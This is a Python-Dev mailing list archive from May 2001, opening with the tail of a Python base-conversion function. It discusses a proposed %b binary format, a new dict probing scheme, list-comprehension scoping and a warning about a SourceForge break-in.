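    if n == 0:
        return "0"
    sign = "-" if n < 0 else ""
    n = abs(n)
    out = []
    while n:
        n, r = divmod(n, base)
        out.append(DIGITS[r])            # least significant digit comes out first
    return sign + "".join(reversed(out))  # reverse once for MSB-first order


print(to_base(0x2D))    # prints 101101 (Greg's example)
print(to_base(13, 3))   # prints 111, the inverse of int("111", 3)
```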
From fdrake at cj42289-a.reston1.va.home.com Wed May 30 23:51:22 2001 From: fdrake at cj42289-a.reston1.va.home.com (Fred Drake) Date: Wed, 30 May 2001 17:51:22 -0400 (EDT) Subject: [Python-Dev] [development doc updates] Message-ID: <20010530215122.3738C28849@cj42289-a.reston1.va.home.com> The development version of the documentation has been updated: http://python.sourceforge.net/devel-docs/ Update for development version of Python (2.2). This update substantially re-works the prototype support for productions of a formal grammar. They look better, support forward references to symbol definitions, and allow download of an all-text version of the complete grammar (with productions ordered the same way as they are in the documentation sources). "Documenting Python" now includes documentation for the LaTeX markup used to describe productions: http://python.sourceforge.net/devel-docs/doc/grammar-displays.html From esr at thyrsus.com Thu May 31 00:05:09 2001 From: esr at thyrsus.com (Eric S. Raymond) Date: Wed, 30 May 2001 18:05:09 -0400 Subject: [Python-Dev] %b format? In-Reply-To: ; from tim.one@home.com on Wed, May 30, 2001 at 05:50:31PM -0400 References: <3B15669A.43B70A44@lemburg.com> Message-ID: <20010530180509.B1305@thyrsus.com> Tim Peters : > -0, due to compound lumpiness: hex() is to %x is to __hex__ as oct() is to > %o is to __oct__ as nothing is to %b is to nothing. In that respect it's > unfortunate that Python has distinct nb_oct and nb_hex slots in the > PyNumberMethods struct (as opposed to a single parameterized "convert to > base N string" method). Is the right answer to add the convert-to-base slot and deprecate the other two? -- Eric S. Raymond If gun laws in fact worked, the sponsors of this type of legislation should have no difficulty drawing upon long lists of examples of criminal acts reduced by such legislation.
That they cannot do so after a century and a half of trying -- that they must sweep under the rug the southern attempts at gun control in the 1870-1910 period, the northeastern attempts in the 1920-1939 period, the attempts at both Federal and State levels in 1965-1976 -- establishes the repeated, complete and inevitable failure of gun laws to control serious crime. -- Senator Orrin Hatch, in a 1982 Senate Report From fdrake at acm.org Thu May 31 00:00:15 2001 From: fdrake at acm.org (Fred L. Drake, Jr.) Date: Wed, 30 May 2001 18:00:15 -0400 (EDT) Subject: [Python-Dev] Most recent documentation update Message-ID: <15125.28015.611763.968854@cj42289-a.reston1.va.home.com> One thing I forgot to mention in my announcement of the update to the development documentation which I just posted is that I went ahead and converted all but one of the productions in the Reference Manual to the new markup. The print_stmt production, unfortunately, is given twice instead of using a single model for the statement. The formatting tools don't support that (yet), and it's not clear that they should. (No, Barry, don't go changing it...!) -Fred -- Fred L. Drake, Jr. PythonLabs at Digital Creations From esr at thyrsus.com Thu May 31 00:03:41 2001 From: esr at thyrsus.com (Eric S. Raymond) Date: Wed, 30 May 2001 18:03:41 -0400 Subject: [Python-Dev] %b format? In-Reply-To: <15125.27362.431144.886216@anthem.wooz.org>; from barry@digicool.com on Wed, May 30, 2001 at 05:49:22PM -0400 References: <930BBCA4CEBBD411BE6500508BB3328F2E1D99@nsamcanms1.ca.baltimore.com> <15125.27362.431144.886216@anthem.wooz.org> Message-ID: <20010530180341.A1305@thyrsus.com> Barry A. Warsaw : > > >>>>> "GW" == Greg Wilson writes: > > GW> I would like to add a "%b" format for converting numbers to > GW> binary format (1's and 0's). > > For completeness, wouldn't you also want a binary integer literal so > your students could write binary numbers in their code? And what > about a binary() operator a la hex()?
Barry is correct. If we're going to do this, we ought to do it right and support binary on a par with decimal, hex, and octal. I favor this. -- Eric S. Raymond The direct use of physical force is so poor a solution to the problem of limited resources that it is commonly employed only by small children and great nations. -- David Friedman From barry at digicool.com Thu May 31 00:05:37 2001 From: barry at digicool.com (Barry A. Warsaw) Date: Wed, 30 May 2001 18:05:37 -0400 Subject: [Python-Dev] Most recent documentation update References: <15125.28015.611763.968854@cj42289-a.reston1.va.home.com> Message-ID: <15125.28337.938136.505675@anthem.wooz.org> >>>>> "Fred" == Fred L Drake, Jr writes: Fred> (No, Barry, don't go changing it...!) Oh darn, three whole days work wasted... :) From tim.one at home.com Thu May 31 00:17:42 2001 From: tim.one at home.com (Tim Peters) Date: Wed, 30 May 2001 18:17:42 -0400 Subject: [Python-Dev] %b format? In-Reply-To: <15125.27362.431144.886216@anthem.wooz.org> Message-ID: Note that in Vyper (John Skaller's Python variant) these are legit integer literals: 0b11111111 0B11111111 0o777 0O777 0d999 0D999 0xfFf 0XFFf Vyper's octal notation is still ugly, but whoever first thought 0777 != 777 was a "good idea" was certifiably insane <0.25 wink>. From tim.one at home.com Thu May 31 00:29:33 2001 From: tim.one at home.com (Tim Peters) Date: Wed, 30 May 2001 18:29:33 -0400 Subject: [Python-Dev] %b format? In-Reply-To: <20010530180509.B1305@thyrsus.com> Message-ID: [Eric S. Raymond] > Is the right answer to add the convert-to-base slot and deprecate the > other two? That would fix "the other" lump here in Python, that e.g. >>> int("111", 3) 13 >>> has no inverse. string->int is happy with any base in 2..36 inclusive, but int->string is spelled via 3 different builtins covering only 3 of those bases. It would be more *expedient* to add "just" a __bin__/nb_bin method + a way to spell binary int literals + a %b format + a bin() builtin. 
On the fifth hand, I doubt anyone would want to add new % format codes for bases {2..36} - {2, 8, 10, 16}. So it will remain lumpy no matter what. I look forward to the PEP . From esr at thyrsus.com Thu May 31 00:38:33 2001 From: esr at thyrsus.com (Eric S. Raymond) Date: Wed, 30 May 2001 18:38:33 -0400 Subject: [Python-Dev] %b format? In-Reply-To: ; from tim.one@home.com on Wed, May 30, 2001 at 06:17:42PM -0400 References: <15125.27362.431144.886216@anthem.wooz.org> Message-ID: <20010530183833.B1654@thyrsus.com> Tim Peters : > Vyper's octal notation is still ugly, but whoever first thought > > 0777 != 777 > > was a "good idea" was certifiably insane <0.25 wink>. For anyone who doesn't know the history behind this... The 0xxx notation was copied from PDP-11 assembler literals -- the instruction-set design of the PDP-11 was such that most of the instruction subfields fit in octal digits, so this convention made it somewhat easier to read machine-code dumps. While I'm at it, I should note that the design of the 11 was ancestral to both the 8088 and 68000 microprocessors, and thus to essentially every new general-purpose computer designed in the last fifteen years. -- Eric S. Raymond "Are we to understand," asked the judge, "that you hold your own interests above the interests of the public?" "I hold that such a question can never arise except in a society of cannibals." -- Ayn Rand From esr at thyrsus.com Thu May 31 00:39:43 2001 From: esr at thyrsus.com (Eric S. Raymond) Date: Wed, 30 May 2001 18:39:43 -0400 Subject: [Python-Dev] %b format? In-Reply-To: ; from tim.one@home.com on Wed, May 30, 2001 at 06:29:33PM -0400 References: <20010530180509.B1305@thyrsus.com> Message-ID: <20010530183943.C1654@thyrsus.com> Tim Peters : > [Eric S. Raymond] > > Is the right answer to add the convert-to-base slot and deprecate the > > other two? > > That would fix "the other" lump here in Python, that e.g. > > >>> int("111", 3) > 13 > >>> > > has no inverse. 
string->int is happy with any base in 2..36 inclusive, but > int->string is spelled via 3 different builtins covering only 3 of those > bases. That sounds like a strong argument to me. -- Eric S. Raymond The world is filled with violence. Because criminals carry guns, we decent law-abiding citizens should also have guns. Otherwise they will win and the decent people will lose. -- James Earl Jones From nas at python.ca Thu May 31 00:38:58 2001 From: nas at python.ca (Neil Schemenauer) Date: Wed, 30 May 2001 15:38:58 -0700 Subject: [Python-Dev] %b format? In-Reply-To: ; from tim.one@home.com on Wed, May 30, 2001 at 06:17:42PM -0400 References: <15125.27362.431144.886216@anthem.wooz.org> Message-ID: <20010530153858.A21901@glacier.fnational.com> Tim Peters wrote: > Vyper's octal notation is still ugly, but whoever first thought > > 0777 != 777 > > was a "good idea" was certifiably insane <0.25 wink>. Ever used MacLisp or ZetaLisp? There: 777 == 0d511 If only we had been born with 8 or 16 fingers, right? Neil From thomas at xs4all.net Thu May 31 03:52:48 2001 From: thomas at xs4all.net (Thomas Wouters) Date: Thu, 31 May 2001 03:52:48 +0200 Subject: [Python-Dev] SF hacked Message-ID: <20010531035248.G690@xs4all.nl> It *seems*, from this site: http://66.92.75.28/~vladimir/themes-org.html that SourceForge has been hacked, and more seriously than SF first admits (if I'm to believe the arrogant sprouting of some script-kiddie, anyway. :) And the same goes for apache.org, it looks like. Anyway, if anyone connected *from* any of sourceforge's machines to anywhere else, in the last couple of months, they'll be well advised to change their passwords and check for intruders. The same goes if you connect through ssh and (foolishly ;) allowed ssh-agent-forwarding to the SF machines. In that case, better check all the machines that ssh-agent would give you unpassworded access to for logins you don't recognize. 
The site above lists a number of sniffed passwords, in case you want to check, but there's no reason for the hacker not to have even more sniffed passwords lying about :) And if you have a login on apache.org, you probably want to change your password in any case.... the above listed site has what seems to be a copy of the shadow password file. -- Thomas Wouters Hi! I'm a .signature virus! copy me into your .signature file to help me spread! From tim.one at home.com Thu May 31 05:53:53 2001 From: tim.one at home.com (Tim Peters) Date: Wed, 30 May 2001 23:53:53 -0400 Subject: [Python-Dev] One more dict trick Message-ID: If anyone has an app known or suspected to be sensitive to dict timing, please try the patch here. Best I've been able to tell, it's a win. But it's a radical change in approach, so I don't want to rush it. This gets rid of the polynomial machinery entirely, along with the branches associated with updating the things, and the dictobject struct member holding the table's poly. Instead it relies on that i = (5*i + 1) % n is a full-period RNG whenever n is a power of 2 (that's what guarantees it will visit every slot), but perturbs that by adding in a few bits from the full hash code shifted right each time (that's what guarantees every bit of the hash code eventually influences the probe sequence, avoiding simple quadratic-time degenerate cases). -------------- next part -------------- An embedded and charset-unspecified text was scrubbed... Name: dict.txt URL: From tim.one at home.com Thu May 31 06:46:56 2001 From: tim.one at home.com (Tim Peters) Date: Thu, 31 May 2001 00:46:56 -0400 Subject: [Python-Dev] %b format? In-Reply-To: <20010530183833.B1654@thyrsus.com> Message-ID: [ESR] > The 0xxx notation was copied from PDP-11 assembler literals -- the > instruction-set design of the PDP-11 was such that most of the > instruction subfields fit in octal digits, so this convention made it > somewhat easier to read machine-code dumps. 
That doesn't mean they weren't certifiably insane. At Cray, we had a much more sensible convention: *all* numbers were octal (yes, it was a 64-bit box and octal didn't make any sense, but Seymour Cray got used to it from the 60-bit CDC w/ 18-bit address registers and didn't feel like changing). My first boss there loved telling the story about how he was out for a drive with the family, and excitedly screamed "Hey, kids! Look! The odometer is just about to change to 40,000!". Of course it read 37,777.9 at the time, and they thought he was nuts. That's where this kind of thing always leads in the end. to-disgrace-despair-and-eventually-ruin-ly y'rs - tim From tim.one at home.com Thu May 31 06:48:28 2001 From: tim.one at home.com (Tim Peters) Date: Thu, 31 May 2001 00:48:28 -0400 Subject: [Python-Dev] %b format? In-Reply-To: <20010530153858.A21901@glacier.fnational.com> Message-ID: [Neil Schemenauer] > Ever used MacLisp or ZetaLisp? There: > > 777 == 0d511 > > If only we had been born with 8 or 16 fingers, right? Then guys would probably be attracted to base 9 or 17. sorry-for-that-but-i-felt-it-was-expected-of-me-ly y'rs - tim From greg at cosc.canterbury.ac.nz Thu May 31 07:15:24 2001 From: greg at cosc.canterbury.ac.nz (Greg Ewing) Date: Thu, 31 May 2001 17:15:24 +1200 (NZST) Subject: [Python-Dev] scoping and list comprehensions In-Reply-To: <15125.23727.168431.762320@beluga.mojam.com> Message-ID: <200105310515.RAA01757@s454.cosc.canterbury.ac.nz> Skip: > scope: > l = [i**2 for i in range(10)] By analogy with C, the introducer of a new scope should simply be an unadorned colon: : l = [i**2 for i in range(10)] :-) While this might be useful, it doesn't really address the issue raised, because we really need a new scope per listcomp (or maybe even each 'for' in the listcomp). > There's also the problem of how to export results from the scope, though > perhaps the new nested scope stuff provides a solution to that.
Nope -- there's still no way to assign to any name in an intermediate scope. Something heretical, such as declarations, would be needed. Greg Ewing, Computer Science Dept, +--------------------------------------+ University of Canterbury, | A citizen of NewZealandCorp, a | Christchurch, New Zealand | wholly-owned subsidiary of USA Inc. | greg at cosc.canterbury.ac.nz +--------------------------------------+ From greg at cosc.canterbury.ac.nz Thu May 31 07:16:11 2001 From: greg at cosc.canterbury.ac.nz (Greg Ewing) Date: Thu, 31 May 2001 17:16:11 +1200 (NZST) Subject: [Python-Dev] Iteration variables and list comprehensions In-Reply-To: Message-ID: <200105310516.RAA01760@s454.cosc.canterbury.ac.nz> Tim: > >>> base3 = [x[:] for x[0] in digits for x[1] in digits for x[2] in > digits] Yikes! That would be clearer as [[x,y,z] for x in digits for y in digits for z in digits] I'll concede it's nowhere near as much fun, though... Greg Ewing, Computer Science Dept, +--------------------------------------+ University of Canterbury, | A citizen of NewZealandCorp, a | Christchurch, New Zealand | wholly-owned subsidiary of USA Inc. | greg at cosc.canterbury.ac.nz +--------------------------------------+ From greg at cosc.canterbury.ac.nz Thu May 31 07:16:41 2001 From: greg at cosc.canterbury.ac.nz (Greg Ewing) Date: Thu, 31 May 2001 17:16:41 +1200 (NZST) Subject: [Python-Dev] Iteration variables and list comprehensions In-Reply-To: Message-ID: <200105310516.RAA01763@s454.cosc.canterbury.ac.nz> Tim: > Needs a PEP, and possibly > even an associated future-statement. Overall, I'm more in favor of changing > it than not. If we do this, we also need to consider whether we want to make the corresponding change to regular for-loops. Seems to me that all the reasons it's a good idea for listcomps apply to for-loops as well. Another advantage of changing both together is that we can continue to describe listcomp semantics in terms of for-loops instead of lambdas. 
Then we won't have to go into hiding until Guido dies or lifts the fatwah against us. Greg Ewing, Computer Science Dept, +--------------------------------------+ University of Canterbury, | A citizen of NewZealandCorp, a | Christchurch, New Zealand | wholly-owned subsidiary of USA Inc. | greg at cosc.canterbury.ac.nz +--------------------------------------+ From greg at cosc.canterbury.ac.nz Thu May 31 07:17:16 2001 From: greg at cosc.canterbury.ac.nz (Greg Ewing) Date: Thu, 31 May 2001 17:17:16 +1200 (NZST) Subject: [Python-Dev] %b format? In-Reply-To: Message-ID: <200105310517.RAA01766@s454.cosc.canterbury.ac.nz> Tim: > On the fifth hand, I doubt anyone would want to add new % format codes for > bases {2..36} - {2, 8, 10, 16}. So, just add one general one: %m.nb with n being the base. If n defaults to 2, you can read the "b" as either "base" or "binary". Literals: 0b(5)21403 general 0b11001101 binary Conversion functions: base(x, n) general bin(x) equivalent to base(x, 2) (for symmetry with existing hex, oct) Type slots: __base__(x, n) Backwards compatibility measures: hex(x) --> base(x, 16) oct(x) --> base(x, 8) bin(x) --> base(x, 2) base(x, n) checks __hex__ and __oct__ slots for special cases of n=16 and n=8, falls back on __base__ There, that takes care of integers. Anyone want to do the equivalent for floats ?-) Greg Ewing, Computer Science Dept, +--------------------------------------+ University of Canterbury, | A citizen of NewZealandCorp, a | Christchurch, New Zealand | wholly-owned subsidiary of USA Inc. | greg at cosc.canterbury.ac.nz +--------------------------------------+ From esr at thyrsus.com Thu May 31 08:01:54 2001 From: esr at thyrsus.com (Eric S. Raymond) Date: Thu, 31 May 2001 02:01:54 -0400 Subject: [Python-Dev] %b format? 
In-Reply-To: <200105310517.RAA01766@s454.cosc.canterbury.ac.nz>; from greg@cosc.canterbury.ac.nz on Thu, May 31, 2001 at 05:17:16PM +1200 References: <200105310517.RAA01766@s454.cosc.canterbury.ac.nz> Message-ID: <20010531020154.A4404@thyrsus.com> Greg Ewing : > So, just add one general one: > > %m.nb > > with n being the base. If n defaults to 2, you can read the "b" > as either "base" or "binary". I had a similar idea, but your version is more elegant. -- Eric S. Raymond The common argument that crime is caused by poverty is a kind of slander on the poor. -- H. L. Mencken From tim_one at email.msn.com Thu May 31 08:20:21 2001 From: tim_one at email.msn.com (Tim Peters) Date: Thu, 31 May 2001 02:20:21 -0400 Subject: [Python-Dev] Iteration variables and list comprehensions In-Reply-To: <200105310516.RAA01763@s454.cosc.canterbury.ac.nz> Message-ID: [Greg Ewing] > If we do this, we also need to consider whether we want > to make the corresponding change to regular for-loops. > Seems to me that all the reasons it's a good idea for > listcomps apply to for-loops as well. I expect there's no chance: unlike listcomps, for-loops allow break statements, and search loops that use the for index after a break (and out of the loop!) are common. > Another advantage of changing both together is that > we can continue to describe listcomp semantics in terms > of for-loops But I'm afraid that's also an advantage of leaving both alone. > instead of lambdas. > > Then we won't have to go into hiding until Guido dies or lifts > the fatwah against us. Death won't stop him -- he's Dutch . From tim_one at email.msn.com Thu May 31 08:28:04 2001 From: tim_one at email.msn.com (Tim Peters) Date: Thu, 31 May 2001 02:28:04 -0400 Subject: [Python-Dev] %b format? In-Reply-To: <200105310517.RAA01766@s454.cosc.canterbury.ac.nz> Message-ID: [Greg Ewing] > So, just add one general one: > > %m.nb > > with n being the base. If n defaults to 2, you can read the "b" > as either "base" or "binary". 
Except .n has a different meaning already for integer conversions: >>> "%.5d" % 2 '00002' >>> "%.10o" % 377 '0000000571' >>> It would be inconsistent to hijack it to mean something else here. > Literals: > > 0b(5)21403 general I've actually got no use for bases outside {2, 8, 10, 16}, and have never heard a request for them either, so I'd be at best -0. Better to stop documenting the full truth about int() <0.9 wink>. > 0b11001101 binary +1. > Conversion functions: > > base(x, n) general -0, as above. > bin(x) equivalent to base(x, 2) (for symmetry with > existing hex, oct) +1 if binary literals are added. > Type slots: > > __base__(x, n) Given the tenor of the above, add __bin__ and call it a day. > Backwards compatibility measures: > > hex(x) --> base(x, 16) > oct(x) --> base(x, 8) > bin(x) --> base(x, 2) > > base(x, n) checks __hex__ and __oct__ slots for special cases > of n=16 and n=8, falls back on __base__ > > There, that takes care of integers. Anyone want to do the > equivalent for floats ?-) Note that C99 introduces a hex notation for floats. From mal at lemburg.com Thu May 31 09:20:11 2001 From: mal at lemburg.com (M.-A. Lemburg) Date: Thu, 31 May 2001 09:20:11 +0200 Subject: [Python-Dev] SF hacked References: <20010531035248.G690@xs4all.nl> Message-ID: <3B15F0AB.34F2F664@lemburg.com> Thomas Wouters wrote: > > It *seems*, from this site: > > http://66.92.75.28/~vladimir/themes-org.html > > that SourceForge has been hacked, and more seriously than SF first admits > (if I'm to believe the arrogant sprouting of some script-kiddie, anyway. :) > And the same goes for apache.org, it looks like. Anyway, if anyone connected > *from* any of sourceforge's machines to anywhere else, in the last couple of > months, they'll be well advised to change their passwords and check for > intruders. The same goes if you connect through ssh and (foolishly ;) > allowed ssh-agent-forwarding to the SF machines.
In that case, better check > all the machines that ssh-agent would give you unpassworded access to for > logins you don't recognize. The site above lists a number of sniffed > passwords, in case you want to check, but there's no reason for the hacker > not to have even more sniffed passwords lying about :) > > And if you have a login on apache.org, you probably want to change your > password in any case.... the above listed site has what seems to be a copy > of the shadow password file. FYI, the file's contents are no longer available it seems. Still, SF seems to be alarmed about this: ***************************************************************************** I M P O R T A N T P L E A S E R E A D ***************************************************************************** If you are seeing this it's because we've failed over from pr-shell1. This is a failover server only. As soon as pr-shell1 is better we will cut back to it. So please do not start any daemon process that you care about. - The SF Staff About the password change: this doesn't seem to be possible on the failover machine (I get a permission denied message). -- Marc-Andre Lemburg CEO eGenix.com Software GmbH ______________________________________________________________________ Company & Consulting: http://www.egenix.com/ Python Software: http://www.lemburg.com/python/ From mal at lemburg.com Thu May 31 09:33:36 2001 From: mal at lemburg.com (M.-A. Lemburg) Date: Thu, 31 May 2001 09:33:36 +0200 Subject: [Python-Dev] One more dict trick References: Message-ID: <3B15F3D0.AD646102@lemburg.com> Tim Peters wrote: > > If anyone has an app known or suspected to be sensitive to dict timing, > please try the patch here. Best I've been able to tell, it's a win. But > it's a radical change in approach, so I don't want to rush it. > > This gets rid of the polynomial machinery entirely, along with the branches > associated with updating the things, and the dictobject struct member > holding the table's poly. 
Instead it relies on that > > i = (5*i + 1) % n > > is a full-period RNG whenever n is a power of 2 (that's what guarantees it > will visit every slot), but perturbs that by adding in a few bits from the > full hash code shifted right each time (that's what guarantees every bit of > the hash code eventually influences the probe sequence, avoiding simple > quadratic-time degenerate cases). Cool idea... rips out all that algebra garble and replaces it with random beauty :-) In any case, this will avoid us the trouble of having to check those poly numbers every time Intel decides to bump the register width by another factor of two ;-) -- Marc-Andre Lemburg CEO eGenix.com Software GmbH ______________________________________________________________________ Company & Consulting: http://www.egenix.com/ Python Software: http://www.lemburg.com/python/ From esr at thyrsus.com Thu May 31 10:43:32 2001 From: esr at thyrsus.com (Eric S. Raymond) Date: Thu, 31 May 2001 04:43:32 -0400 Subject: [Python-Dev] One more dict trick In-Reply-To: <3B15F3D0.AD646102@lemburg.com>; from mal@lemburg.com on Thu, May 31, 2001 at 09:33:36AM +0200 References: <3B15F3D0.AD646102@lemburg.com> Message-ID: <20010531044332.B5026@thyrsus.com> M.-A. Lemburg : > In any case, this will avoid us the trouble of having to check > those poly numbers every time Intel decides to bump the register > width by another factor of two ;-) This seems unlikely. 2^64 = 18446744073709551616, which is roughly 10 ^ 22. Let's assume a memory density of, say, 2^20 machine words or roughly 8 megabytes per cubic centimeter (much, *much* better than we'll be able to do for the foreseeable future -- remember power distribution and heat dissipation). Then, approximating the cubic relation between a sphere's volume and area by lopping off a power of four, we see that 2^64 64-bit words of memory would occupy a sphere of roughly 2^(64 - 20 - 2) cm radius, or about 17 million kilometers.
This is roughly twice the diameter of the Sun. 64-bit computers aren't going to run out of address space any time soon. 64-bit clocks counting seconds will turn over in approximately six trillion years, long after the expansion of the Universe will have dropped its energy density low enough to make computation...well, let's just say "difficult" and leave it at that. Nobody needs 128 bits of integer or floating-point precision, either. There's basically no source of data to compute with that's got anywhere near 22 significant digits of accuracy -- 48 bits is about the most people in scientific computing ever use. -- Eric S. Raymond [President Clinton] boasts about 186,000 people denied firearms under the Brady Law rules. The Brady Law has been in force for three years. In that time, they have prosecuted seven people and put three of them in prison. You know, the President has entertained more felons than that at fundraising coffees in the White House, for Pete's sake." -- Charlton Heston, FOX News Sunday, 18 May 1997 From mal at lemburg.com Thu May 31 11:23:52 2001 From: mal at lemburg.com (M.-A. Lemburg) Date: Thu, 31 May 2001 11:23:52 +0200 Subject: [Python-Dev] One more dict trick References: <3B15F3D0.AD646102@lemburg.com> <20010531044332.B5026@thyrsus.com> Message-ID: <3B160DA8.B9FF9AC2@lemburg.com> "Eric S. Raymond" wrote: > > M.-A. Lemburg : > > In any case, this will avoid us the trouble of having to check > > those poly numbers every time Intel decides to bump the register > > width by another factor of two ;-) > > This seems unlikely. > > 2^64 = 18446744073709551616, which is roughly 10 ^ 22. Let's assume > a memory density of, say, 2^20 machine words or roughly 8 megabytes per > cubic centimeter (much, *much* better than we'll be able to do for the > foreseeable future -- remember power distribution and heat dissipation). Where did you get those numbers from ? There are memory sticks with 128 MB around and these measure about 2.5 cm^2 * 1 mm.
> Then, approximating the cubic relation between a sphere's volume and area > by lopping off a power of four, we see that 2^64 64-bit words of memory > would occupy a sphere of roughly 2^(64 - 20 - 2) cm radius, or about > 17 million kilometers. > > This is roughly twice the diameter of the Sun. 64-bit computers > aren't going to run out of address space any time soon. > > 64-bit clocks counting seconds will turn over in approximately six > trillion years, long after the expansion of the Universe will have > dropped its energy density low enough to make computation...well, > let's just say "difficult" and leave it at that. > > Nobody needs 128 bits of integer or floating-point precision, either. > There's basically no source of data to compute with that's got > anywhere near 22 significant digits of accuracy -- 48 bits is > about the most people in scientific computing ever use. Just you wait... someday marketing people will probably invent the world memory facility and start assigning a few hundred Terabytes for everyone on this planet to use for his/her data storage -- store once, use everywhere ;-) Let's assume we have 12e9 people on this planet by that time, then we'll need 12e9*100e12 = 1.2e24 bytes of central storage... or roughly 2^80 bytes per civilization. Of course, they will want to run Python in order to manage that data and so will all those Palm users hooking up to the facility... ;-) -- Marc-Andre Lemburg CEO eGenix.com Software GmbH ______________________________________________________________________ Company & Consulting: http://www.egenix.com/ Python Software: http://www.lemburg.com/python/ From esr at thyrsus.com Thu May 31 12:31:07 2001 From: esr at thyrsus.com (Eric S.
Raymond) Date: Thu, 31 May 2001 06:31:07 -0400 Subject: [Python-Dev] One more dict trick In-Reply-To: <3B160DA8.B9FF9AC2@lemburg.com>; from mal@lemburg.com on Thu, May 31, 2001 at 11:23:52AM +0200 References: <3B15F3D0.AD646102@lemburg.com> <20010531044332.B5026@thyrsus.com> <3B160DA8.B9FF9AC2@lemburg.com> Message-ID: <20010531063107.B5510@thyrsus.com> M.-A. Lemburg : > > 2^64 = 18446744073709551616, which is roughly 10 ^ 22. Let's assume > > a memory density of, say, 2^20 machine words or roughly 8 megabytes per > > cubic centimeter (much, *much* better than we'll be able to do for the > > foreseeable future -- remember power distribution and heat dissipation). > > Where did you get those numbers from ? There are memory sticks > with 128 MB around and these measure about 2.5 cm^2 * 1 mm. Remember power distribution and heat dissipation. You can't just figure volume of the memory ICs, you have to include power and cooling and structural support too. I eyeballed some DRAM modules I had lying around. In any case, my figures aren't that sensitive to memory density. If I'm off by a factor of 64, the diameter of the memory sphere only drops by a factor of four (it's that cube-root relationship between volume and radius). So it's only half the radius of the Sun. That's still way, *way* more mass than all the planets in the Solar System put together. > Just you wait... someday marketing people will probably invent the > world memory facility and start assigning a few hundred > Terabytes for everyone on this planet to use for his/her data > storage -- store once, use everywhere ;-) > > Let's assume we have 12e9 people on this planet by that time, then > we'll need 12e9*100e12 = 1.2e24 bytes of central storage... or > roughly 2^80 bytes per civilization. Nah. Individual storage requirements would never get that large. Bill Joy did a study on this once and figured out that human beings can generate about 14GB of text during their lifetimes, max.
In a system like the Web-on-steroids one you're supposing, higher-volume stuff like streaming video or Linux-kernel archives would be stored *once* with URLs pointing at them from people's individual stores. One terabyte (2^40) per person leaves plenty of headroom (two orders of magnitude larger). We could still handle a world population of 2^24 or roughly 16 billion people. (I think the size of the Library of Congress has been estimated at several thousand terabytes.) -- Eric S. Raymond I don't like the idea that the police department seems bent on keeping a pool of unarmed victims available for the predations of the criminal class. -- David Mohler, 1989, on being denied a carry permit in NYC From thomas at xs4all.net Thu May 31 12:45:33 2001 From: thomas at xs4all.net (Thomas Wouters) Date: Thu, 31 May 2001 12:45:33 +0200 Subject: [Python-Dev] One more dict trick In-Reply-To: <20010531044332.B5026@thyrsus.com>; from esr@thyrsus.com on Thu, May 31, 2001 at 04:43:32AM -0400 References: <3B15F3D0.AD646102@lemburg.com> <20010531044332.B5026@thyrsus.com> Message-ID: <20010531124533.J690@xs4all.nl> On Thu, May 31, 2001 at 04:43:32AM -0400, Eric S. Raymond wrote: > M.-A. Lemburg : > > In any case, this will avoid us the trouble of having to check > > those poly numbers every time Intel decides to bump the register > > width by another factor of two ;-) > This seems unlikely. Why ? Bumping register size doesn't mean Intel expects to use it all as address space. They could be used for video-processing, or to represent a modest range of rationals , or to help core 'net routers deal with those nasty IPv6 addresses. I'm sure cryptomunchers would like bigger registers as well. Oh wait... I get it! You were trying to get yourself in the history books as the guy that said "64 bits ought to be enough for everyone" :-) -- Thomas Wouters Hi! I'm a .signature virus! copy me into your .signature file to help me spread!
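The probe order Tim proposes in "One more dict trick" (a `5*i + 1` recurrence modulo a power-of-2 table size, perturbed by successively higher bits of the hash) can be sketched in Python. This is an illustration under stated assumptions, not the dictobject.c patch itself: the table size must be a power of 2, the hash is assumed non-negative, and the 5-bit shift per step is an assumption here (it matches the PERTURB_SHIFT value CPython's dictobject.c uses).

```python
def probe_sequence(h: int, n: int, count: int, shift: int = 5) -> list:
    """Return the first `count` slot indices probed for hash h in an n-slot table.

    Sketch only: assumes n is a power of 2 and h >= 0.
    """
    assert n > 0 and n & (n - 1) == 0, "table size must be a power of 2"
    assert h >= 0, "sketch assumes a non-negative hash"
    mask = n - 1
    i = h & mask            # first probe: the low bits of the hash
    perturb = h
    out = [i]
    for _ in range(count - 1):
        perturb >>= shift                  # bring in higher hash bits, a few at a time
        i = (5 * i + perturb + 1) & mask   # the 5*i + 1 recurrence, perturbed
        out.append(i)
    return out

def full_period(n: int) -> bool:
    """Check that the unperturbed i -> (5*i + 1) % n visits every slot of an n-slot table."""
    seen, i = set(), 0
    for _ in range(n):
        seen.add(i)
        i = (5 * i + 1) % n
    return len(seen) == n

print(all(full_period(2 ** k) for k in range(1, 12)))  # True
# Hashes 8 and 1032 share their low 3 bits, so both start at slot 0 of an
# 8-slot table, but the high bits of 1032 steer it onto a different path.
print(probe_sequence(8, 8, 6))     # [0, 1, 6, 7, 4, 5]
print(probe_sequence(1032, 8, 6))  # [0, 1, 7, 4, 5, 2]
```

Once `perturb` has shifted down to zero, the update reduces to the plain `5*i + 1` recurrence, which is why every slot is still guaranteed to be visited eventually.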
From neal at metaslash.com Wed May 30 04:49:45 2001 From: neal at metaslash.com (Neal Norwitz) Date: Tue, 29 May 2001 22:49:45 -0400 Subject: [Python-Dev] PyChecker v0.5 released Message-ID: I was finally able to get version 0.5 out. Just in case this is the first time you are seeing this message, or you forgot what PyChecker is: PyChecker is a tool for finding common bugs in Python source code. It finds problems that are typically caught by a compiler for less dynamic languages, like C and C++. Because of the dynamic nature of Python, some warnings may be incorrect; however, spurious warnings should be fairly infrequent. The highlights are that code at the module scope is now checked. There is still a problem with class variables and globals that are default parameter values. But other than that, there should be no more spurious Variable unused warnings. Code that makes PyChecker raise an exception should now be caught in most cases and this produces a warning. Please mail me if you find it blowing up on your code. The last line processed is shown in the warning, so if you include some context, I can hopefully fix the problem. Also, PyChecker should really use the files passed on the command line, even if it uses the same module name internally. So it will check your warn.py, not PyChecker's warn.py. Feedback, comments, criticisms, new ideas, better ideas, etc. are all greatly appreciated. Thanks to everyone who has taken the time to mail me. If you can think of common mistakes that are made that PyChecker doesn't find, please let me know.
